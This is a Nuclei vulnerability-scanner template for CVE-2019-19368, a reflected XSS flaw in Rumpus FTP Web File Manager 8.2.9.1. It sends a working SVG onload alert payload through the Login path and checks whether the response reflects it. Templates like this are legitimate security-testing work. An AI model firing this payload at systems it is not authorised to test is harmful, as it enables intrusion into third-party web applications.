nuclei-templates/cves/2019/CVE-2019-19368.yaml

22 lines
429 B
YAML

id: CVE-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET
path:
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "value=''><sVg/OnLoAD=alert`1337`//'>"
part: body